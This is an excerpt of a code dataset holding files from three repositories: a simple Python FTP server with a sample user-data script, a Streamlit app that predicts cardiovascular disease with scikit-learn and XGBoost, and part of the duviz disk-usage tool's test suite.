user_dir=\"/\".join(list)\n msg=\"the current dir is %s\"%user_dir\n print(user_dir)\n self.request.send(msg.encode())\n return user_dir\n\n\n\n\n def get(self,*args):\n '''发送文件到客户端'''\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n user_dir = cmd_dic[\"user_dir\"]\n if os.path.isfile(user_dir+\"/\"+filename):\n filesize=os.stat(user_dir+\"/\"+filename).st_size\n self.request.send(str(filesize).encode())\n client_response=self.request.recv(1024) # 服务端收到客户端准备传输的信号\n f=open(user_dir+\"/\"+filename,\"rb\")\n m=hashlib.md5()\n for line in f:\n self.request.send(line)\n m.update(line)\n else:\n print(\"file put success...\")\n f.close()\n file_md5=m.hexdigest()\n self.request.send(file_md5.encode())\n\n\n else:\n message=\"filename:[%s] is not exist..\"%filename\n print(message)\n self.request.send(b\"FileNotFound\")\n\n return user_dir\n\n\n def put(self,*args):\n ''' 接受客户端文件'''\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n filesize = cmd_dic[\"size\"]\n user_dir = cmd_dic[\"user_dir\"]\n print(user_dir+\"/\"+filename)\n if os.path.isfile(user_dir+\"/\"+filename):# 文件存在时\n f = open(user_dir+\"/\"+filename+\".new\",\"wb\")\n else: # 文件不存在时\n f = open(user_dir+\"/\"+filename,\"wb\")\n self.request.send(b\"200 ok\")\n received_size=0\n m=hashlib.md5()\n while received_size < filesize:\n if filesize-received_size >1024: # 解决黏包\n size=1024\n else:\n size=filesize-received_size\n data = self.request.recv(size)\n m.update(data)\n f.write(data)\n received_size+=len(data) # 因为data本来就是byte len(data)就可以直接获取data大小(字节数)\n else:\n print(\"filename: [%s] has uploaded...\"%filename)\n f.close()\n file_md5 = m.hexdigest()\n file_client_md5 = self.request.recv(1024).decode()\n\n if file_md5 == file_client_md5:\n print(\"server file's md5 is the same as client file's md5:uploading success!!\")\n else:\n print(\"md5 is different with client file's md5:uploading failed...\")\n return user_dir\n\n\n\n\n def handle(self):\n '''handler处理类'''\n\n\n self.user_dic=self.request.recv(1024).strip().decode()\n try:\n user_data=json.loads(self.user_dic)\n except Exception as e:\n pass\n login_signal,user_dir=self.authenticat(user_data)\n if login_signal:\n while True:\n self.data=self.request.recv(1024).strip()\n print(\"{} wrote:\".format(self.client_address[0]))\n cmd_dic = json.loads(self.data.decode())\n cmd_dic['user_dir']=user_dir\n action = cmd_dic[\"action\"]\n if hasattr(self,action):\n if action !=\"cd_back\":\n func = getattr(self,action)\n user_dir=func(cmd_dic)\n else:\n func =getattr(self,action)\n user_dir=func(cmd_dic,user_data['username'])\n\n\ndef run():\n HOST,PORT=\"172.16.95.131\",9999\n server = socketserver.ThreadingTCPServer((HOST,PORT),MyTCPHandler)\n server.serve_forever()"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7045454382896423,
"avg_line_length": 17.85714340209961,
"blob_id": "b9165f4a210bb5d0640e479e79704f5c328a2908",
"content_id": "20d331157f92e08edc1baf3359710c94b6bbaeb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 7,
"path": "/ftp_server/conf/setting.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport os\n\nBASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n"
},
{
"alpha_fraction": 0.6066176295280457,
"alphanum_fraction": 0.6433823704719543,
"avg_line_length": 17.066667556762695,
"blob_id": "b436619facd3c4812524e0a547b86e830bfe5e8b",
"content_id": "c51b64ea27d446b2556f41ecce4483c1cc375a89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/ftp_server/data/create_data.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport json\nfrom conf import setting\n\nuser_data={\n \"username\":\"yhr123\",\n \"password\":\"960314\",\n \"user_dir\":setting.BASE_DIR+\"/yhr123\"\n}\n\nwith open(\"yhr123.txt\",\"w+\") as f:\n f.write(json.dumps(user_data))\n\n"
}
] | 7 |
BcanTayiz/CardioVascularDisease | https://github.com/BcanTayiz/CardioVascularDisease | 581213f6f878966e3fc0efa61a8bc3080be7c4ca | 1f934402758f43c089ada31f693e2b444c7d03b9 | 7ceb414d1984b2a5a2302b160a9205d30f4cbffb | refs/heads/main | 2023-01-13T05:32:11.086317 | 2020-11-22T09:00:44 | 2020-11-22T09:00:44 | 314,996,699 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6517453193664551,
"alphanum_fraction": 0.6662307381629944,
"avg_line_length": 37.07480239868164,
"blob_id": "ac3fda0c58049ad13e5637530229d9151c5447ff",
"content_id": "43967e28da55ff5b6f1280494c09d0981b8775b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9941,
"license_type": "permissive",
"max_line_length": 182,
"num_lines": 254,
"path": "/app.py",
"repo_name": "BcanTayiz/CardioVascularDisease",
"src_encoding": "UTF-8",
"text": "import streamlit as st \r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport seaborn as sns \r\nfrom matplotlib import pyplot\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.inspection import permutation_importance\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom xgboost import XGBClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.metrics import r2_score\r\nimport datetime\r\nimport random\r\nfrom sklearn import preprocessing\r\nfrom sklearn.metrics import balanced_accuracy_score\r\nimport streamlit_theme as stt\r\nimport streamlit.components.v1 as components\r\nfrom datetime import date\r\n\r\n\r\nrandom.seed(10)\r\nstt.set_theme({'primary': '#1b3388'})\r\nst.title(\"Cardiovascular Disease Alert\")\r\n\r\nst.write(\"Created by Barış Can Tayiz\")\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\nst.header(\"Variables\")\r\nst.write(\r\n\"\"\"* Age | Objective Feature | age | int (days) \\n\r\n* Height | Objective Feature | height | int (cm) | \\n\r\n* Weight | Objective Feature | weight | float (kg) | \\n\r\n* Gender | Objective Feature | gender | categorical code | \\n\r\n* Systolic blood pressure | Examination Feature | ap_hi | int | \\n\r\n* Diastolic blood pressure | Examination Feature | ap_lo | int | \\n\r\n* Cholesterol | Examination Feature | cholesterol | 1: normal, 2: above normal, 3: well above normal | \\n\r\n* Glucose | Examination Feature | gluc | 1: normal, 2: above normal, 3: well above normal | \\n\r\n* Smoking | Subjective Feature | smoke | binary |\\n\r\n* Alcohol intake | Subjective Feature | alco | binary | \\n\r\n* Physical activity | Subjective Feature | active | binary | \\n\r\n* Presence or absence of cardiovascular disease | Target Variable | cardio | binary |\"\"\"\r\n)\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\ndata = pd.read_csv('cardio_train.csv',sep=\";\")\r\n\r\ndata = data.drop('id',axis=1)\r\n\r\nst.write(data.describe())\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\nclassifier_types = (\"Random Forests\",\"XGBClassifier\",\"Neural Net\")\r\n\r\nclassifier_name = st.sidebar.selectbox(\"Select Regressor\",classifier_types)\r\n\r\nst.header(\"Correlation Values of parameters\")\r\n\r\ncm = sns.light_palette(\"coral\", as_cmap=True) \r\n\r\nst.write(data.corr().style.background_gradient(cmap=cm).set_precision(2))\r\n\r\nX = data.drop('cardio',axis=1)\r\ny = data['cardio']\r\n\r\nx = X #returns a numpy array\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nx_scaled = min_max_scaler.fit_transform(x)\r\nX = pd.DataFrame(x_scaled)\r\n\r\n\r\nX = X.apply(pd.to_numeric)\r\ny = y.apply(pd.to_numeric)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef parameter_ui(classifier_name):\r\n params = dict()\r\n if classifier_name == classifier_types[0]:\r\n n_estimators = st.sidebar.slider(\"n_estimators\",11,99)\r\n criterion = st.sidebar.selectbox(\"criterion\",(\"gini\", \"entropy\"))\r\n max_depth = st.sidebar.slider(\"max_depth\",1,100)\r\n min_samples_split = st.sidebar.slider(\"min_samples_split\",2,100)\r\n min_samples_leaf = st.sidebar.slider(\"min_samples_leaf\",1,100)\r\n max_features = st.sidebar.selectbox(\"criterion\",(\"auto\", \"sqrt\", \"log2\"))\r\n bootstrap = st.sidebar.selectbox(\"bootstrap\",(\"True\",\"False\"))\r\n oob_score = st.sidebar.selectbox(\"oob_score\",(\"True\",\"False\"))\r\n class_weight = st.sidebar.selectbox(\"class_weight\",(\"balanced\",\"balanced_subsample\"))\r\n\r\n params[\"n_estimators\"] = n_estimators\r\n params[\"criterion\"] = criterion\r\n params[\"max_depth\"] = max_depth\r\n params[\"min_samples_split\"] = min_samples_split\r\n params[\"min_samples_leaf\"] = min_samples_leaf\r\n params[\"max_features\"] = max_features\r\n params[\"bootstrap\"] = bootstrap\r\n params[\"oob_score\"] = oob_score\r\n params[\"class_weight\"] = class_weight\r\n \r\n\r\n elif classifier_name == classifier_types[1]:\r\n booster = st.sidebar.selectbox(\"booster\",(\"gbtree\", \"gblinear\",\"dart\"))\r\n verbosity = st.sidebar.selectbox(\"verbosity\",(0,1,2,3))\r\n nthread = st.sidebar.slider(\"nthread \",1,100)\r\n eta = st.sidebar.slider(\"eta \",0,100,1)\r\n gamma = st.sidebar.slider(\"gamma \",0,100)\r\n max_depth = st.sidebar.slider(\"max_depth \",1,100)\r\n min_child_weight = st.sidebar.slider(\"min_child_weight \",0,100)\r\n max_delta_step = st.sidebar.slider(\"max_delta_step \",0,100)\r\n\r\n eta = eta / 100\r\n\r\n params[\"booster\"] = booster\r\n params[\"verbosity\"] = verbosity\r\n params[\"nthread\"] = nthread\r\n params[\"eta\"] = eta\r\n params[\"gamma\"] = gamma\r\n params[\"max_depth\"] = max_depth\r\n params[\"min_child_weight\"] = min_child_weight\r\n params[\"max_delta_step\"] = max_delta_step\r\n\r\n elif classifier_name == classifier_types[2]:\r\n hidden_layer_sizes = st.sidebar.slider(\"hidden_layer_sizes\",1,50)\r\n activation = st.sidebar.selectbox(\"activation\",(\"identity\", \"logistic\",\"tanh\",\"relu\"))\r\n solver = st.sidebar.selectbox(\"solver\",(\"lbfgs\", \"sgd\", \"adam\"))\r\n alpha = st.sidebar.slider(\"alpha\",0,100,1)\r\n batch_size = st.sidebar.slider(\"min_samples_leaf\",1,100)\r\n learning_rate = st.sidebar.selectbox(\"learning_rate\",(\"constant\", \"invscaling\", \"adaptive\"))\r\n max_iter = st.sidebar.slider(\"max_iter\",1,100)\r\n shuffle = st.sidebar.selectbox(\"shuffle\",(\"True\", \"False\"))\r\n\r\n alpha = alpha / 100\r\n\r\n params[\"hidden_layer_sizes\"] = hidden_layer_sizes\r\n params[\"activation\"] = activation\r\n params[\"solver\"] = solver\r\n params[\"alpha\"] = alpha\r\n params[\"batch_size\"] = batch_size\r\n params[\"learning_rate\"] = learning_rate\r\n params[\"max_iter\"] = max_iter\r\n\r\n return params\r\n\r\n\r\nparams = parameter_ui(classifier_name)\r\n\r\ndef get_classifier(classifier_name,params):\r\n if classifier_name == classifier_types[0]:\r\n clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"], criterion=params[\"criterion\"],max_depth=params[\"max_depth\"]\r\n ,min_samples_split = params[\"min_samples_split\"],min_samples_leaf = params[\"min_samples_leaf\"],max_features = params[\"max_features\"],\r\n oob_score = params['oob_score'],class_weight = params['class_weight'] )\r\n elif classifier_name == classifier_types[1]:\r\n clf = XGBClassifier(booster=params[\"booster\"], verbosity=params[\"verbosity\"],nthread=params[\"nthread\"],eta=params[\"eta\"],gamma=params[\"gamma\"],max_depth=params[\"max_depth\"],\r\n min_child_weight = params[\"min_child_weight\"],max_delta_step = params[\"max_delta_step\"])\r\n elif classifier_name == classifier_types[2]:\r\n clf = MLPClassifier(hidden_layer_sizes=params[\"hidden_layer_sizes\"],activation=params[\"activation\"],solver=params[\"solver\"],\r\n alpha=params[\"alpha\"],batch_size=params[\"batch_size\"],learning_rate=params[\"learning_rate\"],max_iter = params[\"max_iter\"])\r\n\r\n return clf\r\n\r\nclf = get_classifier(classifier_name,params)\r\n\r\nst.write(clf) \r\n\r\n#Classifier\r\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1,random_state = 42)\r\n\r\nclf.fit(X_train,y_train)\r\ny_pred = clf.predict(X_test)\r\n\r\n#MODEL IMPORTANCE\r\ntry:\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n st.header(\"Feature Importance Figure\")\r\n importances = clf.feature_importances_\r\n # summarize feature importance\r\n for i,v in enumerate(importances):\r\n print('Feature: %0d, Score: %.5f' % (i,v))\r\n # plot feature importance\r\n from matplotlib.pyplot import figure\r\n figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')\r\n pyplot.bar([data.iloc[:,x].name for x in range(len(importances))], importances)\r\n\r\n st.pyplot()\r\nexcept:\r\n pass\r\n\r\n\r\n\r\nst.header(\"Balanced Accuracy Score\")\r\nst.write(\"Balanced Accuracy Score shows the related accuracy level of predicted and real values. It should be close to 1 for best training results\")\r\nst.write(balanced_accuracy_score(y_test, y_pred))\r\n\r\n\r\nst.header(\"Get your Cardiovascular Condition\")\r\n\r\nbirthDay = st.text_input(\"Enter your Birthday as yyyy-mm-dd: \")\r\ngender = st.text_input(\"Enter your gender, 1 women; 2 men: \")\r\nheight =st.text_input(\"Enter your height, as cm: \")\r\nweight = st.text_input(\"Enter your weight, as kg: \")\r\nap_hi = st.text_input(\"Enter your Systolic blood pressure ap_hi: \")\r\nap_lo = st.text_input(\"Enter your Diastolic blood pressure ap_lo: \")\r\nchol = st.text_input(\"Enter your Cholesterol level, 1: normal; 2: above normal;3: well above normal : \")\r\ngluc = st.text_input(\"Enter your Glucose level, 1: normal; 2: above normal;3: well above normal : \")\r\nsmoke = st.text_input(\"Enter your smoke, yes 1; no 0: \")\r\nalco = st.text_input(\"Enter your alco, yes 1; no 0: \")\r\nactive = st.text_input(\"Enter your physical activity, yes 1; no 0: \")\r\n\r\n\r\ntoday = pd.to_datetime(date.today())\r\nbirthDay = pd.to_datetime(birthDay)\r\ndays = int((today-birthDay).days)\r\n\r\n\r\nentry_prediction = [int(days),int(gender),int(height),int(weight),int(ap_hi),\r\nint(ap_lo),int(chol),int(gluc),int(smoke),int(alco),int(active)]\r\n\r\n\r\n\r\n\r\nif len(entry_prediction) == 11 :\r\n\r\n\r\n df = pd.DataFrame(columns = x.columns)\r\n df = df.append(x)\r\n df.loc[x.shape[0]+1] = entry_prediction\r\n\r\n\r\n\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n df_scaled = min_max_scaler.fit_transform(df.tail(2))\r\n entryPred_df = pd.DataFrame(df_scaled)\r\n\r\n \r\n prediction = clf.predict_proba((entryPred_df.astype(float)))\r\n st.write(prediction)\r\n st.header(\"Probable {0} {1}\".format(\"Cardiovascular Disease\",'%{:,.2f}'.format(prediction[1][1])))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.46621620655059814,
"alphanum_fraction": 0.662162184715271,
"avg_line_length": 16.5,
"blob_id": "d97de58a690e996ae0a53f32810b966727ff9de7",
"content_id": "139f12997ba9e92536af0dd54d4da224f512ea33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 148,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "BcanTayiz/CardioVascularDisease",
"src_encoding": "UTF-8",
"text": "pandas==1.1.4\r\nxgboost==1.2.1\r\nstreamlit_theme==0.58.0\r\nmatplotlib==3.3.3\r\nseaborn==0.11.0\r\nnumpy==1.19.3\r\nstreamlit==0.71.0\r\nscikit_learn==0.23.2\r\n"
}
] | 2 |
soxofaan/duviz | https://github.com/soxofaan/duviz | 18e369e601fb234798189043b0f69e497b4af8bf | 288e3e1b0cc352a93e2ed58f405163fc9428bdfe | 2db386b0abdbdefd50ba8389be6fce112ef408e1 | refs/heads/main | 2023-04-28T06:27:06.512070 | 2023-04-17T20:32:07 | 2023-04-17T20:32:07 | 3,297,972 | 93 | 17 | MIT | 2012-01-29T15:59:42 | 2023-03-09T21:59:41 | 2023-04-15T10:25:36 | Python | [
{
"alpha_fraction": 0.3501076400279999,
"alphanum_fraction": 0.40581271052360535,
"avg_line_length": 28.609561920166016,
"blob_id": "8f160cd82cbca92f468e378c12c7835f4f7c085d",
"content_id": "6629fc7a4fe40e1c3f4414cf822e0bdacc1a3747",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22309,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 753,
"path": "/test_duviz.py",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\n# TODO: test actual CLI\n\nimport itertools\nimport tarfile\nimport textwrap\nimport zipfile\nfrom pathlib import Path\nfrom typing import List\n\nimport pytest\n\nfrom duviz import (\n TreeRenderer,\n SIZE_FORMATTER_COUNT,\n SIZE_FORMATTER_BYTES,\n SIZE_FORMATTER_BYTES_BINARY,\n path_split,\n SizeTree,\n AsciiDoubleLineBarRenderer,\n DuProcessor,\n InodeProcessor,\n get_progress_reporter,\n AsciiSingleLineBarRenderer,\n ColorDoubleLineBarRenderer,\n ColorSingleLineBarRenderer,\n Colorizer,\n ZipFileProcessor,\n TarFileProcessor,\n)\n\n\ndef test_bar_one():\n assert 'y' == TreeRenderer().bar('x', 1, small='y')\n\n\ndef test_bar_zero():\n assert '' == TreeRenderer().bar('x', 0)\n\n\ndef test_bar_basic():\n assert '[--abcd--]' == TreeRenderer().bar('abcd', 10)\n\n\ndef test_bar_left_and_right():\n assert '<<--abcd--**' == TreeRenderer().bar('abcd', 12, left='<<', right='**')\n\n\ndef test_bar_fill():\n assert '[++abcd++]' == TreeRenderer().bar('abcd', 10, fill='+')\n\n\ndef test_bar_unicode():\n assert '[++åßc∂++]' == TreeRenderer().bar('åßc∂', 10, fill='+')\n\n\ndef test_bar_unicode2():\n label = b'\\xc3\\xb8o\\xcc\\x82o\\xcc\\x88o\\xcc\\x81a\\xcc\\x8a'.decode('utf8')\n assert '[+øôöóå+]' == TreeRenderer().bar(label, 9, fill='+')\n\n\[email protected](\n \"expected\",\n [\n '',\n '|',\n '[]',\n '[f]',\n '[fo]',\n '[foo]',\n '[_foo]',\n '[_foo_]',\n '[_foo_-]',\n '[-_foo_-]',\n '[-_foo_--]',\n '[--_foo_--]',\n '[--_foo_---]',\n '[---_foo_---]',\n ]\n)\ndef test_bar_padding(expected):\n assert expected == TreeRenderer().bar('foo', width=len(expected), fill=\"-\", label_padding='_')\n\n\[email protected](\n \"expected\",\n [\n '',\n 'f',\n 'fo',\n 'foo',\n '_foo',\n '_foo_',\n '_foo_-',\n '-_foo_-',\n ]\n)\ndef test_bar_no_left_right(expected):\n assert expected == TreeRenderer().bar(\n 'foo', width=len(expected),\n left='', right='', small='*', fill=\"-\", label_padding='_',\n )\n\n\[email protected](\n \"expected\",\n [\n '',\n '=',\n '==',\n '===',\n '[[]]',\n '[[f]]',\n '[[fo]]',\n '[[foo]]',\n '[[_foo]]',\n '[[_foo_]]',\n '[[_foo_-]]',\n '[[-_foo_-]]',\n ]\n)\ndef test_bar_small(expected):\n assert expected == TreeRenderer().bar(\n 'foo', width=len(expected),\n left='[[', right=']]', small='=', fill=\"-\", label_padding='_',\n )\n\n\[email protected](\n \"expected\",\n [\n '',\n '#',\n '#=',\n '#=+',\n '#=+#',\n '#=+#=',\n '[<[]>]',\n '[<[f]>]',\n ]\n)\ndef test_bar_small_multiple(expected):\n assert expected == TreeRenderer().bar(\n 'f', width=len(expected),\n left='[<[', right=']>]', small='#=+', fill=\"-\", label_padding='_',\n )\n\n\nTREE123 = SizeTree(\"foo\", 123)\n\nTREE60 = SizeTree(\"foo\", 60, children={\n \"bar\": SizeTree(\"bar\", 40, children={\n \"xe\": SizeTree(\"xe\", 20),\n \"vo\": SizeTree(\"vo\", 10),\n }),\n \"baz\": SizeTree(\"baz\", 20, children={\n \"pu\": SizeTree(\"pu\", 10),\n }),\n})\n\nTREE80 = SizeTree(\"foo\", 80, children={\n \"vy\": SizeTree(\"vy\", 50, children={\n \"a\": SizeTree(\"a\", 20),\n \"b\": SizeTree(\"b\", 9),\n \"c\": SizeTree(\"c\", 10),\n \"d\": SizeTree(\"d\", 11),\n }),\n \"dy\": SizeTree(\"dy\", 11, children={\n \"py\": SizeTree(\"py\", 11),\n }),\n \"do\": SizeTree(\"do\", 9, children={\n \"po\": SizeTree(\"po\", 9),\n }),\n \"da\": SizeTree(\"da\", 10, ),\n})\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 4, [\n \"____\",\n \"[fo]\",\n \"[12]\"\n ]),\n (TREE123, 5, [\n \"_____\",\n \"[foo]\",\n \"[123]\"\n ]),\n (TREE123, 10, [\n \"__________\",\n \"[ foo ]\",\n \"[__123___]\"\n ]),\n (TREE123, 20, [\n \"____________________\",\n \"[ foo ]\",\n \"[_______123________]\"\n ]),\n (TREE60, 18, [\n \"__________________\",\n \"[ foo ]\",\n \"[_______60_______]\",\n \"[ bar ][baz ]\",\n \"[____40____][_20_]\",\n \"[ xe ][v] [p] \",\n \"[_20_][1] [1] \",\n ]),\n (TREE60, 36, [\n \"____________________________________\",\n \"[ foo ]\",\n \"[________________60________________]\",\n \"[ bar ][ baz ]\",\n \"[__________40__________][____20____]\",\n \"[ xe ][ vo ] [ pu ] \",\n \"[____20____][_10_] [_10_] \",\n ]),\n (TREE60, 60, [\n \"____________________________________________________________\",\n \"[ foo ]\",\n \"[____________________________60____________________________]\",\n \"[ bar ][ baz ]\",\n \"[__________________40__________________][________20________]\",\n \"[ xe ][ vo ] [ pu ] \",\n \"[________20________][___10___] [___10___] \",\n ]),\n ]\n)\ndef test_ascii_double_line_bar_renderer(tree, width, expected):\n assert AsciiDoubleLineBarRenderer().render(tree, width=width) == expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\"[foo]\"]),\n (TREE123, 10, [\"[foo: 123]\"]),\n (TREE123, 20, [\"[.... foo: 123 ....]\"]),\n (TREE60, 18, [\n \"[... foo: 60 ....]\",\n \"[ bar: 40 .][baz:]\",\n \"[xe: ][v] [p] \",\n\n ]),\n (TREE60, 36, [\n \"[............ foo: 60 .............]\",\n \"[...... bar: 40 .......][ baz: 20 .]\",\n \"[. xe: 20 .][vo: ] [pu: ] \",\n\n ]),\n (TREE60, 60, [\n \"[........................ foo: 60 .........................]\",\n \"[.............. bar: 40 ...............][.... baz: 20 .....]\",\n \"[..... xe: 20 .....][ vo: 10 ] [ pu: 10 ] \",\n ]\n )\n ]\n)\ndef test_ascii_single_line_bar_renderer(tree, width, expected):\n assert AsciiSingleLineBarRenderer().render(tree, width=width) == expected\n\n\ndef test_colorize_rgy():\n clz = Colorizer()\n marked = \"_\".join(clz.wrap(t) for t in [\"AAA\", \"BBB\", \"CCC\", \"DDD\", \"EEE\"])\n colorize = clz.get_colorize_rgy()\n expected = \"\\x1b[41;97mAAA\\x1b[0m_\\x1b[42;30mBBB\\x1b[0m_\\x1b[43;30mCCC\\x1b[0m\" \\\n \"_\\x1b[41;97mDDD\\x1b[0m_\\x1b[42;30mEEE\\x1b[0m\"\n assert colorize(marked) == expected\n\n\ndef test_colorize_bmc():\n clz = Colorizer()\n marked = \"_\".join(clz.wrap(t) for t in [\"AAA\", \"BBB\", \"CCC\", \"DDD\", \"EEE\"])\n colorize = clz.get_colorize_bmc()\n expected = \"\\x1b[44;97mAAA\\x1b[0m_\\x1b[45;30mBBB\\x1b[0m_\\x1b[46;30mCCC\\x1b[0m\" \\\n \"_\\x1b[44;97mDDD\\x1b[0m_\\x1b[45;30mEEE\\x1b[0m\"\n assert colorize(marked) == expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 123 \\x1b[0m\",\n ]),\n (TREE123, 10, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 123 \\x1b[0m\"\n ]),\n (TREE80, 40, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 80 \\x1b[0m\",\n \"\\x1b[44;97m vy \\x1b[0m\\x1b\"\n + \"[45;30m dy \\x1b[0m\\x1b[46;30m da \\x1b[0m\\x1b[44;97m do \\x1b[0m\",\n \"\\x1b[44;97m 50 \\x1b[0m\\x1b\"\n + \"[45;30m 11 \\x1b[0m\\x1b[46;30m 10 \\x1b[0m\\x1b[44;97m 9 \\x1b[0m\",\n \"\\x1b[42;30m a \\x1b[0m\\x1b[43;30m d \\x1b[0m\\x1b[41;97m c \\x1b[0m\\x1b[42;30m b \\x1b[0m\"\n + \"\\x1b[43;30m py \\x1b[0m \\x1b[41;97m po \\x1b[0m\",\n \"\\x1b[42;30m 20 \\x1b[0m\\x1b[43;30m 11 \\x1b[0m\\x1b[41;97m 10 \\x1b[0m\\x1b[42;30m 9 \\x1b[0m\"\n + \"\\x1b[43;30m 11 \\x1b[0m \\x1b[41;97m 9 \\x1b[0m\"\n ])\n ]\n)\ndef test_color_double_line_bar_renderer(tree, width, expected):\n assert ColorDoubleLineBarRenderer().render(tree, width=width) == expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\"\\x1b[41;97mfoo: \\x1b[0m\"]),\n (TREE123, 10, [\"\\x1b[41;97m foo: 123 \\x1b[0m\"]),\n (TREE80, 40, [\n \"\\x1b[41;97m foo: 80 \\x1b[0m\",\n \"\\x1b[44;97m vy: 50 \\x1b[0m\"\n + \"\\x1b[45;30mdy: 1\\x1b[0m\\x1b[46;30mda: 1\\x1b[0m\\x1b[44;97mdo: 9\\x1b[0m\",\n \"\\x1b[42;30m a: 20 \\x1b[0m\\x1b[43;30md: 11\\x1b[0m\\x1b[41;97mc: 10\\x1b[0m\\x1b[42;30m b: 9\\x1b[0m\"\n + \"\\x1b[43;30mpy: 1\\x1b[0m \\x1b[41;97mpo: 9\\x1b[0m\",\n ])\n ]\n)\ndef test_color_single_line_bar_renderer(tree, width, expected):\n assert ColorSingleLineBarRenderer().render(tree, width=width) == expected\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0'),\n (10, '10'),\n (999, '999'),\n (1000, '1.00k'),\n (5432, '5.43k'),\n (5678, '5.68k'),\n (999990, '999.99k'),\n (999999, '1.00M'),\n (1000000, '1.00M'),\n (1000000000, '1.00G'),\n (1000000000000, '1.00T'),\n ]\n)\ndef test_formatter_count(x, expected):\n assert expected == SIZE_FORMATTER_COUNT.format(x)\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0B'),\n (10, '10B'),\n (999, '999B'),\n (1000, '1.00KB'),\n (5432, '5.43KB'),\n (5678, '5.68KB'),\n (999990, '999.99KB'),\n (999999, '1.00MB'),\n (1000000, '1.00MB'),\n ]\n)\ndef test_formatter_bytes(x, expected):\n assert expected == SIZE_FORMATTER_BYTES.format(x)\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0B'),\n (10, '10B'),\n (999, '999B'),\n (1000, '1000B'),\n (1023, '1023B'),\n (1024, '1.00KiB'),\n (5432, '5.30KiB'),\n (1000000, '976.56KiB'),\n (1024 * 1024, '1.00MiB'),\n (1024 * 1024 * 1024, '1.00GiB'),\n (1024 * 1024 * 1024 * 1024, '1.00TiB'),\n ]\n)\ndef test_formatter_bytes_binary(x, expected):\n assert expected == SIZE_FORMATTER_BYTES_BINARY.format(x)\n\n\[email protected](\n [\"path\", \"expected\"],\n [\n ('aa', ['aa']),\n ('aa/', ['aa']),\n ('aa/bB', ['aa', 'bB']),\n ('/aA/bB/c_c', ['/', 'aA', 'bB', 'c_c']),\n ('/aA/bB/c_c/', ['/', 'aA', 'bB', 'c_c']),\n ]\n)\ndef test_path_split(path, expected):\n assert expected == path_split(path)\n\n\[email protected](\n [\"path\", \"base\", \"expected\"],\n [\n ('aa', 'a', ['aa']),\n ('aa/', '', ['aa']),\n ('a/b/c/d/', 'a', ['a', 'b', 'c', 'd']),\n ('a/b/c/d/', 'a/b', ['a/b', 'c', 'd']),\n ('a/b/c/d/', 'a/b/', ['a/b', 'c', 'd']),\n ('a/b/c/d/', 'a/b/c', ['a/b/c', 'd']),\n ('a/b/c/d/', 'a/b/c/d', ['a/b/c/d']),\n ('a/b/c/d', 'a/b/c/d/', ['a/b/c/d']),\n ('a/b/c/d', 'a/B', ['a', 'b', 'c', 'd']),\n ]\n)\ndef test_path_split_with_base(path, base, expected):\n assert expected == path_split(path, base)\n\n\ndef _dedent(s: str) -> str:\n \"\"\"Helper to unindent strings for quick and easy text listings\"\"\"\n return 